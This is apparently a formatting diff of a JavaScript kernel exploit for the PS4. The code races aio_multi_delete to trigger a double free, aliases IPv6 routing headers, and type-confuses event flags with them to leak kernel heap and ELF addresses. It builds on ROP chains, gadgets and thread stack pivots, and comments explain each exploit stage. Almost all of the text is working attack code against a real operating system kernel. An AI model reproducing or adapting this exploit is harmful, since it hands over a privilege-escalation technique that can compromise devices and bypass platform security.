- return chain.sysi(...args);
+ return chain.sysi(...args);
}
function call_nze(...args) {
- const res = chain.call_int(...args);
- if (res !== 0) {
- die(`call(${args[0]}) returned nonzero: ${res}`);
- }
+ const res = chain.call_int(...args);
+ if (res !== 0) {
+ die(`call(${args[0]}) returned nonzero: ${res}`);
+ }
}
// #define SCE_KERNEL_AIO_STATE_NOTIFIED 0x10000
@@ -244,7 +251,7 @@ function call_nze(...args) {
// SceKernelAioSubmitId ids[]
// );
function aio_submit_cmd(cmd, requests, num_requests, handles) {
- sysi('aio_submit_cmd', cmd, requests, num_requests, 3, handles);
+ sysi("aio_submit_cmd", cmd, requests, num_requests, 3, handles);
}
// the various SceAIO syscalls that copies out errors/states will not check if
@@ -259,8 +266,8 @@ const _aio_errors_p = _aio_errors.addr;
// u_int num_ids,
// int sce_errors[]
// );
-function aio_multi_delete(ids, num_ids, sce_errs=_aio_errors_p) {
- sysi('aio_multi_delete', ids, num_ids, sce_errs);
+function aio_multi_delete(ids, num_ids, sce_errs = _aio_errors_p) {
+ sysi("aio_multi_delete", ids, num_ids, sce_errs);
}
// int
@@ -269,8 +276,8 @@ function aio_multi_delete(ids, num_ids, sce_errs=_aio_errors_p) {
// u_int num_ids,
// int states[]
// );
-function aio_multi_poll(ids, num_ids, sce_errs=_aio_errors_p) {
- sysi('aio_multi_poll', ids, num_ids, sce_errs);
+function aio_multi_poll(ids, num_ids, sce_errs = _aio_errors_p) {
+ sysi("aio_multi_poll", ids, num_ids, sce_errs);
}
// int
@@ -279,8 +286,8 @@ function aio_multi_poll(ids, num_ids, sce_errs=_aio_errors_p) {
// u_int num_ids,
// int states[]
// );
-function aio_multi_cancel(ids, num_ids, sce_errs=_aio_errors_p) {
- sysi('aio_multi_cancel', ids, num_ids, sce_errs);
+function aio_multi_cancel(ids, num_ids, sce_errs = _aio_errors_p) {
+ sysi("aio_multi_cancel", ids, num_ids, sce_errs);
}
// // wait for all (AND) or atleast one (OR) to finish
@@ -298,183 +305,161 @@ function aio_multi_cancel(ids, num_ids, sce_errs=_aio_errors_p) {
// uint32_t mode,
// useconds_t *timeout
// );
-function aio_multi_wait(ids, num_ids, sce_errs=_aio_errors_p) {
- sysi('aio_multi_wait', ids, num_ids, sce_errs, 1, 0);
+function aio_multi_wait(ids, num_ids, sce_errs = _aio_errors_p) {
+ sysi("aio_multi_wait", ids, num_ids, sce_errs, 1, 0);
}
function make_reqs1(num_reqs) {
- const reqs1 = new Buffer(0x28 * num_reqs);
- for (let i = 0; i < num_reqs; i++) {
- // .fd = -1
- reqs1.write32(0x20 + i*0x28, -1);
- }
- return reqs1;
+ const reqs1 = new Buffer(0x28 * num_reqs);
+ for (let i = 0; i < num_reqs; i++) {
+ // .fd = -1
+ reqs1.write32(0x20 + i * 0x28, -1);
+ }
+ return reqs1;
}
-function spray_aio(
- loops=1, reqs1_p, num_reqs, ids_p, multi=true, cmd=AIO_CMD_READ,
-) {
- const step = 4 * (multi ? num_reqs : 1);
- cmd |= multi ? AIO_CMD_FLAG_MULTI : 0;
- for (let i = 0, idx = 0; i < loops; i++) {
- aio_submit_cmd(cmd, reqs1_p, num_reqs, ids_p.add(idx));
- idx += step;
- }
+function spray_aio(loops = 1, reqs1_p, num_reqs, ids_p, multi = true, cmd = AIO_CMD_READ) {
+ const step = 4 * (multi ? num_reqs : 1);
+ cmd |= multi ? AIO_CMD_FLAG_MULTI : 0;
+ for (let i = 0, idx = 0; i < loops; i++) {
+ aio_submit_cmd(cmd, reqs1_p, num_reqs, ids_p.add(idx));
+ idx += step;
+ }
}
-function poll_aio(ids, states, num_ids=ids.length) {
- if (states !== undefined) {
- states = states.addr;
- }
- aio_multi_poll(ids.addr, num_ids, states);
+function poll_aio(ids, states, num_ids = ids.length) {
+ if (states !== undefined) {
+ states = states.addr;
+ }
+ aio_multi_poll(ids.addr, num_ids, states);
}
function cancel_aios(ids_p, num_ids) {
- const len = max_aio_ids;
- const rem = num_ids % len;
- const num_batches = (num_ids - rem) / len;
- for (let bi = 0; bi < num_batches; bi++) {
- aio_multi_cancel(ids_p.add((bi << 2) * len), len);
- }
- if (rem) {
- aio_multi_cancel(ids_p.add((num_batches << 2) * len), rem);
- }
+ const len = max_aio_ids;
+ const rem = num_ids % len;
+ const num_batches = (num_ids - rem) / len;
+ for (let bi = 0; bi < num_batches; bi++) {
+ aio_multi_cancel(ids_p.add((bi << 2) * len), len);
+ }
+ if (rem) {
+ aio_multi_cancel(ids_p.add((num_batches << 2) * len), rem);
+ }
}
function free_aios(ids_p, num_ids) {
- const len = max_aio_ids;
- const rem = num_ids % len;
- const num_batches = (num_ids - rem) / len;
- for (let bi = 0; bi < num_batches; bi++) {
- const addr = ids_p.add((bi << 2) * len);
- aio_multi_cancel(addr, len);
- aio_multi_poll(addr, len);
- aio_multi_delete(addr, len);
- }
- if (rem) {
- const addr = ids_p.add((num_batches << 2) * len);
- aio_multi_cancel(addr, len);
- aio_multi_poll(addr, len);
- aio_multi_delete(addr, len);
- }
+ const len = max_aio_ids;
+ const rem = num_ids % len;
+ const num_batches = (num_ids - rem) / len;
+ for (let bi = 0; bi < num_batches; bi++) {
+ const addr = ids_p.add((bi << 2) * len);
+ aio_multi_cancel(addr, len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
+ if (rem) {
+ const addr = ids_p.add((num_batches << 2) * len);
+ aio_multi_cancel(addr, len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
}
function free_aios2(ids_p, num_ids) {
- const len = max_aio_ids;
- const rem = num_ids % len;
- const num_batches = (num_ids - rem) / len;
- for (let bi = 0; bi < num_batches; bi++) {
- const addr = ids_p.add((bi << 2) * len);
- aio_multi_poll(addr, len);
- aio_multi_delete(addr, len);
- }
- if (rem) {
- const addr = ids_p.add((num_batches << 2) * len);
- aio_multi_poll(addr, len);
- aio_multi_delete(addr, len);
- }
+ const len = max_aio_ids;
+ const rem = num_ids % len;
+ const num_batches = (num_ids - rem) / len;
+ for (let bi = 0; bi < num_batches; bi++) {
+ const addr = ids_p.add((bi << 2) * len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
+ if (rem) {
+ const addr = ids_p.add((num_batches << 2) * len);
+ aio_multi_poll(addr, len);
+ aio_multi_delete(addr, len);
+ }
}
function get_our_affinity(mask) {
- sysi(
- 'cpuset_getaffinity',
- CPU_LEVEL_WHICH,
- CPU_WHICH_TID,
- -1,
- 8,
- mask.addr,
- );
+ sysi("cpuset_getaffinity", CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 8, mask.addr);
}
function set_our_affinity(mask) {
- sysi(
- 'cpuset_setaffinity',
- CPU_LEVEL_WHICH,
- CPU_WHICH_TID,
- -1,
- 8,
- mask.addr,
- );
+ sysi("cpuset_setaffinity", CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 8, mask.addr);
}
function close(fd) {
- sysi('close', fd);
+ sysi("close", fd);
}
function new_socket() {
- return sysi('socket', AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
+ return sysi("socket", AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
}
function new_tcp_socket() {
- return sysi('socket', AF_INET, SOCK_STREAM, 0);
+ return sysi("socket", AF_INET, SOCK_STREAM, 0);
}
function gsockopt(sd, level, optname, optval, optlen) {
- const size = new Word(optval.size);
- if (optlen !== undefined) {
- size[0] = optlen;
- }
+ const size = new Word(optval.size);
+ if (optlen !== undefined) {
+ size[0] = optlen;
+ }
- sysi('getsockopt', sd, level, optname, optval.addr, size.addr);
- return size[0];
+ sysi("getsockopt", sd, level, optname, optval.addr, size.addr);
+ return size[0];
}
function setsockopt(sd, level, optname, optval, optlen) {
- sysi('setsockopt', sd, level, optname, optval, optlen);
+ sysi("setsockopt", sd, level, optname, optval, optlen);
}
function ssockopt(sd, level, optname, optval, optlen) {
- if (optlen === undefined) {
- optlen = optval.size;
- }
+ if (optlen === undefined) {
+ optlen = optval.size;
+ }
- const addr = optval.addr;
- setsockopt(sd, level, optname, addr, optlen);
+ const addr = optval.addr;
+ setsockopt(sd, level, optname, addr, optlen);
}
function get_rthdr(sd, buf, len) {
- return gsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+ return gsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
}
function set_rthdr(sd, buf, len) {
- ssockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+ ssockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
}
function free_rthdrs(sds) {
- for (const sd of sds) {
- setsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, 0, 0);
- }
+ for (const sd of sds) {
+ setsockopt(sd, IPPROTO_IPV6, IPV6_RTHDR, 0, 0);
+ }
}
function build_rthdr(buf, size) {
- const len = ((size >> 3) - 1) & ~1;
- size = (len + 1) << 3;
+ const len = ((size >> 3) - 1) & ~1;
+ size = (len + 1) << 3;
- buf[0] = 0;
- buf[1] = len;
- buf[2] = 0;
- buf[3] = len >> 1;
+ buf[0] = 0;
+ buf[1] = len;
+ buf[2] = 0;
+ buf[3] = len >> 1;
- return size;
+ return size;
}
function spawn_thread(thread) {
- const ctx = new Buffer(context_size);
- const pthread = new Pointer();
- pthread.ctx = ctx;
- // pivot the pthread's stack pointer to our stack
- ctx.write64(0x38, thread.stack_addr);
- ctx.write64(0x80, thread.get_gadget('ret'));
+ const ctx = new Buffer(context_size);
+ const pthread = new Pointer();
+ pthread.ctx = ctx;
+ // pivot the pthread's stack pointer to our stack
+ ctx.write64(0x38, thread.stack_addr);
+ ctx.write64(0x80, thread.get_gadget("ret"));
- call_nze(
- 'pthread_create',
- pthread.addr,
- 0,
- chain.get_gadget('setcontext'),
- ctx.addr,
- );
+ call_nze("pthread_create", pthread.addr, 0, chain.get_gadget("setcontext"), ctx.addr);
- return pthread;
+ return pthread;
}
// EXPLOIT STAGES IMPLEMENTATION
@@ -482,33 +467,33 @@ function spawn_thread(thread) {
// FUNCTIONS FOR STAGE: 0x80 MALLOC ZONE DOUBLE FREE
function make_aliased_rthdrs(sds) {
- const marker_offset = 4;
- const size = 0x80;
- const buf = new Buffer(size);
- const rsize = build_rthdr(buf, size);
+ const marker_offset = 4;
+ const size = 0x80;
+ const buf = new Buffer(size);
+ const rsize = build_rthdr(buf, size);
- for (let loop = 0; loop < num_alias; loop++) {
- for (let i = 0; i < num_sds; i++) {
- buf.write32(marker_offset, i);
- set_rthdr(sds[i], buf, rsize);
- }
-
- for (let i = 0; i < sds.length; i++) {
- get_rthdr(sds[i], buf);
- const marker = buf.read32(marker_offset);
- if (marker !== i) {
- log(`aliased rthdrs at attempt: ${loop}`);
- const pair = [sds[i], sds[marker]];
- log(`found pair: ${pair}`);
- sds.splice(marker, 1);
- sds.splice(i, 1);
- free_rthdrs(sds);
- sds.push(new_socket(), new_socket());
- return pair;
- }
- }
+ for (let loop = 0; loop < num_alias; loop++) {
+ for (let i = 0; i < num_sds; i++) {
+ buf.write32(marker_offset, i);
+ set_rthdr(sds[i], buf, rsize);
}
- die(`failed to make aliased rthdrs. size: ${hex(size)}`);
+
+ for (let i = 0; i < sds.length; i++) {
+ get_rthdr(sds[i], buf);
+ const marker = buf.read32(marker_offset);
+ if (marker !== i) {
+ log(`aliased rthdrs at attempt: ${loop}`);
+ const pair = [sds[i], sds[marker]];
+ log(`found pair: ${pair}`);
+ sds.splice(marker, 1);
+ sds.splice(i, 1);
+ free_rthdrs(sds);
+ sds.push(new_socket(), new_socket());
+ return pair;
+ }
+ }
+ }
+ die(`failed to make aliased rthdrs. size: ${hex(size)}`);
}
// summary of the bug at aio_multi_delete():
@@ -557,634 +542,611 @@ function make_aliased_rthdrs(sds) {
// // ...
// }
function race_one(request_addr, tcp_sd, barrier, racer, sds) {
- const sce_errs = new View4([-1, -1]);
- const thr_mask = new Word(1 << main_core);
+ const sce_errs = new View4([-1, -1]);
+ const thr_mask = new Word(1 << main_core);
- const thr = racer;
- thr.push_syscall(
- 'cpuset_setaffinity',
- CPU_LEVEL_WHICH,
- CPU_WHICH_TID,
- -1,
- 8,
- thr_mask.addr,
- );
- thr.push_syscall('rtprio_thread', RTP_SET, 0, rtprio.addr);
- thr.push_gadget('pop rax; ret');
- thr.push_value(1);
- thr.push_get_retval();
- thr.push_call('pthread_barrier_wait', barrier.addr);
- thr.push_syscall(
- 'aio_multi_delete',
- request_addr,
- 1,
- sce_errs.addr_at(1),
- );
- thr.push_call('pthread_exit', 0);
+ const thr = racer;
+ thr.push_syscall("cpuset_setaffinity", CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, 8, thr_mask.addr);
+ thr.push_syscall("rtprio_thread", RTP_SET, 0, rtprio.addr);
+ thr.push_gadget("pop rax; ret");
+ thr.push_value(1);
+ thr.push_get_retval();
+ thr.push_call("pthread_barrier_wait", barrier.addr);
+ thr.push_syscall("aio_multi_delete", request_addr, 1, sce_errs.addr_at(1));
+ thr.push_call("pthread_exit", 0);
- const pthr = spawn_thread(thr);
- const thr_tid = pthr.read32(0);
+ const pthr = spawn_thread(thr);
+ const thr_tid = pthr.read32(0);
- // pthread barrier implementation:
- //
- // given a barrier that needs N threads for it to be unlocked, a thread
- // will sleep if it waits on the barrier and N - 1 threads havent't arrived
- // before
- //
- // if there were already N - 1 threads then that thread (last waiter) won't
- // sleep and it will send out a wake-up call to the waiting threads
- //
- // since the ps4's cores only have 1 hardware thread each, we can pin 2
- // threads on the same core and control the interleaving of their
- // executions via controlled context switches
+ // pthread barrier implementation:
+ //
+ // given a barrier that needs N threads for it to be unlocked, a thread
+ // will sleep if it waits on the barrier and N - 1 threads havent't arrived
+ // before
+ //
+ // if there were already N - 1 threads then that thread (last waiter) won't
+ // sleep and it will send out a wake-up call to the waiting threads
+ //
+ // since the ps4's cores only have 1 hardware thread each, we can pin 2
+ // threads on the same core and control the interleaving of their
+ // executions via controlled context switches
- // wait for the worker to enter the barrier and sleep
- while (thr.retval_int === 0) {
- sys_void('sched_yield');
- }
+ // wait for the worker to enter the barrier and sleep
+ while (thr.retval_int === 0) {
+ sys_void("sched_yield");
+ }
- // enter the barrier as the last waiter
- chain.push_call('pthread_barrier_wait', barrier.addr);
- // yield and hope the scheduler runs the worker next. the worker will then
- // sleep at soclose() and hopefully we run next
- chain.push_syscall('sched_yield');
- // if we get here and the worker hasn't been reran then we can delay the
- // worker's execution of soclose() indefinitely
- chain.push_syscall('thr_suspend_ucontext', thr_tid);
- chain.push_get_retval();
- chain.push_get_errno();
- chain.push_end();
- chain.run();
- chain.reset();
+ // enter the barrier as the last waiter
+ chain.push_call("pthread_barrier_wait", barrier.addr);
+ // yield and hope the scheduler runs the worker next. the worker will then
+ // sleep at soclose() and hopefully we run next
+ chain.push_syscall("sched_yield");
+ // if we get here and the worker hasn't been reran then we can delay the
+ // worker's execution of soclose() indefinitely
+ chain.push_syscall("thr_suspend_ucontext", thr_tid);
+ chain.push_get_retval();
+ chain.push_get_errno();
+ chain.push_end();
+ chain.run();
+ chain.reset();
- const main_res = chain.retval_int;
- log(`suspend ${thr_tid}: ${main_res} errno: ${chain.errno}`);
-
- if (main_res === -1) {
- call_nze('pthread_join', pthr, 0);
- log();
- return null;
- }
-
- let won_race = false;
- try {
- const poll_err = new View4(1);
- aio_multi_poll(request_addr, 1, poll_err.addr);
- log(`poll: ${hex(poll_err[0])}`);
-
- const info_buf = new View1(size_tcp_info);
- const info_size = gsockopt(tcp_sd, IPPROTO_TCP, TCP_INFO, info_buf);
- log(`info size: ${hex(info_size)}`);
-
- if (info_size !== size_tcp_info) {
- die(`info size isn't ${size_tcp_info}: ${info_size}`);
- }
-
- const tcp_state = info_buf[0];
- log(`tcp_state: ${tcp_state}`);
-
- const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
- if (poll_err[0] !== SCE_KERNEL_ERROR_ESRCH
- && tcp_state !== TCPS_ESTABLISHED
- ) {
- // PANIC: double free on the 0x80 malloc zone. important kernel
- // data may alias
- aio_multi_delete(request_addr, 1, sce_errs.addr);
- won_race = true;
- }
- } finally {
- log('resume thread\n');
- sysi('thr_resume_ucontext', thr_tid);
- call_nze('pthread_join', pthr, 0);
- }
-
- if (won_race) {
- log(`race errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
- // if the code has no bugs then this isn't possible but we keep the
- // check for easier debugging
- if (sce_errs[0] !== sce_errs[1]) {
- log('ERROR: bad won_race');
- die('ERROR: bad won_race');
- }
- // RESTORE: double freed memory has been reclaimed with harmless data
- // PANIC: 0x80 malloc zone pointers aliased
- return make_aliased_rthdrs(sds);
- }
+ const main_res = chain.retval_int;
+ log(`suspend ${thr_tid}: ${main_res} errno: ${chain.errno}`);
+ if (main_res === -1) {
+ call_nze("pthread_join", pthr, 0);
+ log();
return null;
+ }
+
+ let won_race = false;
+ try {
+ const poll_err = new View4(1);
+ aio_multi_poll(request_addr, 1, poll_err.addr);
+ log(`poll: ${hex(poll_err[0])}`);
+
+ const info_buf = new View1(size_tcp_info);
+ const info_size = gsockopt(tcp_sd, IPPROTO_TCP, TCP_INFO, info_buf);
+ log(`info size: ${hex(info_size)}`);
+
+ if (info_size !== size_tcp_info) {
+ die(`info size isn't ${size_tcp_info}: ${info_size}`);
+ }
+
+ const tcp_state = info_buf[0];
+ log(`tcp_state: ${tcp_state}`);
+
+ const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
+ if (poll_err[0] !== SCE_KERNEL_ERROR_ESRCH && tcp_state !== TCPS_ESTABLISHED) {
+ // PANIC: double free on the 0x80 malloc zone. important kernel
+ // data may alias
+ aio_multi_delete(request_addr, 1, sce_errs.addr);
+ won_race = true;
+ }
+ } finally {
+ log("resume thread\n");
+ sysi("thr_resume_ucontext", thr_tid);
+ call_nze("pthread_join", pthr, 0);
+ }
+
+ if (won_race) {
+ log(`race errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
+ // if the code has no bugs then this isn't possible but we keep the
+ // check for easier debugging
+ if (sce_errs[0] !== sce_errs[1]) {
+ log("ERROR: bad won_race");
+ die("ERROR: bad won_race");
+ }
+ // RESTORE: double freed memory has been reclaimed with harmless data
+ // PANIC: 0x80 malloc zone pointers aliased
+ return make_aliased_rthdrs(sds);
+ }
+
+ return null;
}
function double_free_reqs2(sds) {
- function swap_bytes(x, byte_length) {
- let res = 0;
- for (let i = 0; i < byte_length; i++) {
- res |= ((x >> 8 * i) & 0xff) << 8 * (byte_length - i - 1);
- }
-
- return res >>> 0;
+ function swap_bytes(x, byte_length) {
+ let res = 0;
+ for (let i = 0; i < byte_length; i++) {
+ res |= ((x >> (8 * i)) & 0xff) << (8 * (byte_length - i - 1));
}
- function htons(x) {
- return swap_bytes(x, 2);
+ return res >>> 0;
+ }
+
+ function htons(x) {
+ return swap_bytes(x, 2);
+ }
+
+ function htonl(x) {
+ return swap_bytes(x, 4);
+ }
+
+ const server_addr = new Buffer(16);
+ // sockaddr_in.sin_family
+ server_addr[1] = AF_INET;
+ // sockaddr_in.sin_port
+ server_addr.write16(2, htons(5050));
+ // sockaddr_in.sin_addr = 127.0.0.1
+ server_addr.write32(4, htonl(0x7f000001));
+
+ const racer = new Chain();
+ const barrier = new Long();
+ call_nze("pthread_barrier_init", barrier.addr, 0, 2);
+
+ const num_reqs = 3;
+ const which_req = num_reqs - 1;
+ const reqs1 = make_reqs1(num_reqs);
+ const reqs1_p = reqs1.addr;
+ const aio_ids = new View4(num_reqs);
+ const aio_ids_p = aio_ids.addr;
+ const req_addr = aio_ids.addr_at(which_req);
+ const cmd = AIO_CMD_MULTI_READ;
+
+ const sd_listen = new_tcp_socket();
+ ssockopt(sd_listen, SOL_SOCKET, SO_REUSEADDR, new Word(1));
+
+ sysi("bind", sd_listen, server_addr.addr, server_addr.size);
+ sysi("listen", sd_listen, 1);
+
+ for (let i = 0; i < num_races; i++) {
+ const sd_client = new_tcp_socket();
+ sysi("connect", sd_client, server_addr.addr, server_addr.size);
+
+ const sd_conn = sysi("accept", sd_listen, 0, 0);
+ // force soclose() to sleep
+ ssockopt(sd_client, SOL_SOCKET, SO_LINGER, View4.of(1, 1));
+ reqs1.write32(0x20 + which_req * 0x28, sd_client);
+
+ aio_submit_cmd(cmd, reqs1_p, num_reqs, aio_ids_p);
+ aio_multi_cancel(aio_ids_p, num_reqs);
+ aio_multi_poll(aio_ids_p, num_reqs);
+
+ // drop the reference so that aio_multi_delete() will trigger _fdrop()
+ close(sd_client);
+
+ const res = race_one(req_addr, sd_conn, barrier, racer, sds);
+ racer.reset();
+
+ // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented
+ // twice. this will leave one request undeleted
+ aio_multi_delete(aio_ids_p, num_reqs);
+ close(sd_conn);
+
+ if (res !== null) {
+ log(`won race at attempt: ${i}`);
+ close(sd_listen);
+ call_nze("pthread_barrier_destroy", barrier.addr);
+ return res;
}
+ }
- function htonl(x) {
- return swap_bytes(x, 4);
- }
-
- const server_addr = new Buffer(16);
- // sockaddr_in.sin_family
- server_addr[1] = AF_INET;
- // sockaddr_in.sin_port
- server_addr.write16(2, htons(5050));
- // sockaddr_in.sin_addr = 127.0.0.1
- server_addr.write32(4, htonl(0x7f000001));
-
- const racer = new Chain();
- const barrier = new Long();
- call_nze('pthread_barrier_init', barrier.addr, 0, 2);
-
- const num_reqs = 3;
- const which_req = num_reqs - 1;
- const reqs1 = make_reqs1(num_reqs);
- const reqs1_p = reqs1.addr;
- const aio_ids = new View4(num_reqs);
- const aio_ids_p = aio_ids.addr;
- const req_addr = aio_ids.addr_at(which_req);
- const cmd = AIO_CMD_MULTI_READ;
-
- const sd_listen = new_tcp_socket();
- ssockopt(sd_listen, SOL_SOCKET, SO_REUSEADDR, new Word(1));
-
- sysi('bind', sd_listen, server_addr.addr, server_addr.size);
- sysi('listen', sd_listen, 1);
-
- for (let i = 0; i < num_races; i++) {
- const sd_client = new_tcp_socket();
- sysi('connect', sd_client, server_addr.addr, server_addr.size);
-
- const sd_conn = sysi('accept', sd_listen, 0, 0);
- // force soclose() to sleep
- ssockopt(sd_client, SOL_SOCKET, SO_LINGER, View4.of(1, 1));
- reqs1.write32(0x20 + which_req*0x28, sd_client);
-
- aio_submit_cmd(cmd, reqs1_p, num_reqs, aio_ids_p);
- aio_multi_cancel(aio_ids_p, num_reqs);
- aio_multi_poll(aio_ids_p, num_reqs);
-
- // drop the reference so that aio_multi_delete() will trigger _fdrop()
- close(sd_client);
-
- const res = race_one(req_addr, sd_conn, barrier, racer, sds);
- racer.reset();
-
- // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented
- // twice. this will leave one request undeleted
- aio_multi_delete(aio_ids_p, num_reqs);
- close(sd_conn);
-
- if (res !== null) {
- log(`won race at attempt: ${i}`);
- close(sd_listen);
- call_nze('pthread_barrier_destroy', barrier.addr);
- return res;
- }
- }
-
- die('failed aio double free');
+ die("failed aio double free");
}
// FUNCTIONS FOR STAGE: LEAK 0x100 MALLOC ZONE ADDRESS
function new_evf(flags) {
- const name = cstr('');
- // int evf_create(char *name, uint32_t attributes, uint64_t flags)
- return sysi('evf_create', name.addr, 0, flags);
+ const name = cstr("");
+ // int evf_create(char *name, uint32_t attributes, uint64_t flags)
+ return sysi("evf_create", name.addr, 0, flags);
}
function set_evf_flags(id, flags) {
- sysi('evf_clear', id, 0);
- sysi('evf_set', id, flags);
+ sysi("evf_clear", id, 0);
+ sysi("evf_set", id, flags);
}
function free_evf(id) {
- sysi('evf_delete', id);
+ sysi("evf_delete", id);
}
function verify_reqs2(buf, offset) {
- // reqs2.ar2_cmd
- if (buf.read32(offset) !== AIO_CMD_WRITE) {
- return false;
+ // reqs2.ar2_cmd
+ if (buf.read32(offset) !== AIO_CMD_WRITE) {
+ return false;
+ }
+
+ // heap addresses are prefixed with 0xffff_xxxx
+ // xxxx is randomized on boot
+ //
+ // heap_prefixes is a array of randomized prefix bits from a group of heap
+ // address candidates. if the candidates truly are from the heap, they must
+ // share a common prefix
+ const heap_prefixes = [];
+
+ // check if offsets 0x10 to 0x20 look like a kernel heap address
+ for (let i = 0x10; i <= 0x20; i += 8) {
+ if (buf.read16(offset + i + 6) !== 0xffff) {
+ return false;
}
+ heap_prefixes.push(buf.read16(offset + i + 4));
+ }
- // heap addresses are prefixed with 0xffff_xxxx
- // xxxx is randomized on boot
- //
- // heap_prefixes is a array of randomized prefix bits from a group of heap
- // address candidates. if the candidates truly are from the heap, they must
- // share a common prefix
- const heap_prefixes = [];
+ // check reqs2.ar2_result.state
+ // state is actually a 32-bit value but the allocated memory was
+ // initialized with zeros. all padding bytes must be 0 then
+ let state = buf.read32(offset + 0x38);
+ if (!(0 < state && state <= 4) || buf.read32(offset + 0x38 + 4) !== 0) {
+ return false;
+ }
- // check if offsets 0x10 to 0x20 look like a kernel heap address
- for (let i = 0x10; i <= 0x20; i += 8) {
- if (buf.read16(offset + i + 6) !== 0xffff) {
- return false;
- }
+ // reqs2.ar2_file must be NULL since we passed a bad file descriptor to
+ // aio_submit_cmd()
+ if (!buf.read64(offset + 0x40).eq(0)) {
+ return false;
+ }
+
+ // check if offsets 0x48 to 0x50 look like a kernel address
+ for (let i = 0x48; i <= 0x50; i += 8) {
+ if (buf.read16(offset + i + 6) === 0xffff) {
+ // don't push kernel ELF addresses
+ if (buf.read16(offset + i + 4) !== 0xffff) {
heap_prefixes.push(buf.read16(offset + i + 4));
+ }
+ // offset 0x48 can be NULL
+ } else if (i === 0x50 || !buf.read64(offset + i).eq(0)) {
+ return false;
}
+ }
- // check reqs2.ar2_result.state
- // state is actually a 32-bit value but the allocated memory was
- // initialized with zeros. all padding bytes must be 0 then
- let state = buf.read32(offset + 0x38);
- if (!(0 < state && state <= 4) || buf.read32(offset + 0x38 + 4) !== 0) {
- return false;
- }
-
- // reqs2.ar2_file must be NULL since we passed a bad file descriptor to
- // aio_submit_cmd()
- if (!buf.read64(offset + 0x40).eq(0)) {
- return false;
- }
-
- // check if offsets 0x48 to 0x50 look like a kernel address
- for (let i = 0x48; i <= 0x50; i += 8) {
- if (buf.read16(offset + i + 6) === 0xffff) {
- // don't push kernel ELF addresses
- if (buf.read16(offset + i + 4) !== 0xffff) {
- heap_prefixes.push(buf.read16(offset + i + 4));
- }
- // offset 0x48 can be NULL
- } else if (i === 0x50 || !buf.read64(offset + i).eq(0)) {
- return false;
- }
- }
-
- return heap_prefixes.every((e, i, a) => e === a[0]);
+ return heap_prefixes.every((e, i, a) => e === a[0]);
}
function leak_kernel_addrs(sd_pair) {
- close(sd_pair[1]);
- const sd = sd_pair[0];
- const buf = new Buffer(0x80 * leak_len);
+ close(sd_pair[1]);
+ const sd = sd_pair[0];
+ const buf = new Buffer(0x80 * leak_len);
- // type confuse a struct evf with a struct ip6_rthdr. the flags of the evf
- // must be set to >= 0xf00 in order to fully leak the contents of the rthdr
- log('confuse evf with rthdr');
- let evf = null;
- for (let i = 0; i < num_alias; i++) {
- const evfs = [];
- for (let i = 0; i < num_handles; i++) {
- evfs.push(new_evf(0xf00 | i << 16));
- }
-
- get_rthdr(sd, buf, 0x80);
- // for simplicity, we'll assume i < 2**16
- const flags32 = buf.read32(0);
- evf = evfs[flags32 >>> 16];
-
- set_evf_flags(evf, flags32 | 1);
- get_rthdr(sd, buf, 0x80);
-
- if (buf.read32(0) === flags32 | 1) {
- evfs.splice(flags32 >> 16, 1);
- } else {
- evf = null;
- }
-
- for (const evf of evfs) {
- free_evf(evf);
- }
-
- if (evf !== null) {
- log(`confused rthdr and evf at attempt: ${i}`);
- break;
- }
+ // type confuse a struct evf with a struct ip6_rthdr. the flags of the evf
+ // must be set to >= 0xf00 in order to fully leak the contents of the rthdr
+ log("confuse evf with rthdr");
+ let evf = null;
+ for (let i = 0; i < num_alias; i++) {
+ const evfs = [];
+ for (let i = 0; i < num_handles; i++) {
+ evfs.push(new_evf(0xf00 | (i << 16)));
}
- if (evf === null) {
- die('failed to confuse evf and rthdr');
- }
+ get_rthdr(sd, buf, 0x80);
+ // for simplicity, we'll assume i < 2**16
+ const flags32 = buf.read32(0);
+ evf = evfs[flags32 >>> 16];
- set_evf_flags(evf, 0xff << 8);
+ set_evf_flags(evf, flags32 | 1);
get_rthdr(sd, buf, 0x80);
- // fields we use from evf (number before the field is the offset in hex):
- // struct evf:
- // 0 u64 flags
- // 28 struct cv cv
- // 38 TAILQ_HEAD(struct evf_waiter) waiters
-
- // evf.cv.cv_description = "evf cv"
- // string is located at the kernel's mapped ELF file
- const kernel_addr = buf.read64(0x28);
- log(`"evf cv" string addr: ${kernel_addr}`);
- // because of TAILQ_INIT(), we have:
- //
- // evf.waiters.tqh_last == &evf.waiters.tqh_first
- //
- // we now know the address of the kernel buffer we are leaking
- const kbuf_addr = buf.read64(0x40).sub(0x38);
- log(`kernel buffer addr: ${kbuf_addr}`);
-
- // 0x80 < num_elems * sizeof(SceKernelAioRWRequest) <= 0x100
- // allocate reqs1 arrays at 0x100 malloc zone
- const num_elems = 6;
- // use reqs1 to fake a aio_info. set .ai_cred (offset 0x10) to offset 4 of
- // the reqs2 so crfree(ai_cred) will harmlessly decrement the .ar2_ticket
- // field
- const ucred = kbuf_addr.add(4);
-
- const leak_reqs = make_reqs1(num_elems);
- const leak_reqs_p = leak_reqs.addr;
- leak_reqs.write64(0x10, ucred);
-
- const leak_ids_len = num_handles * num_elems;
- const leak_ids = new View4(leak_ids_len);
- const leak_ids_p = leak_ids.addr;
-
- log('find aio_entry');
- let reqs2_off = null;
- loop: for (let i = 0; i < num_leaks; i++) {
- get_rthdr(sd, buf);
-
- spray_aio(
- num_handles,
- leak_reqs_p,
- num_elems,
- leak_ids_p,
- true,
- AIO_CMD_WRITE,
- );
-
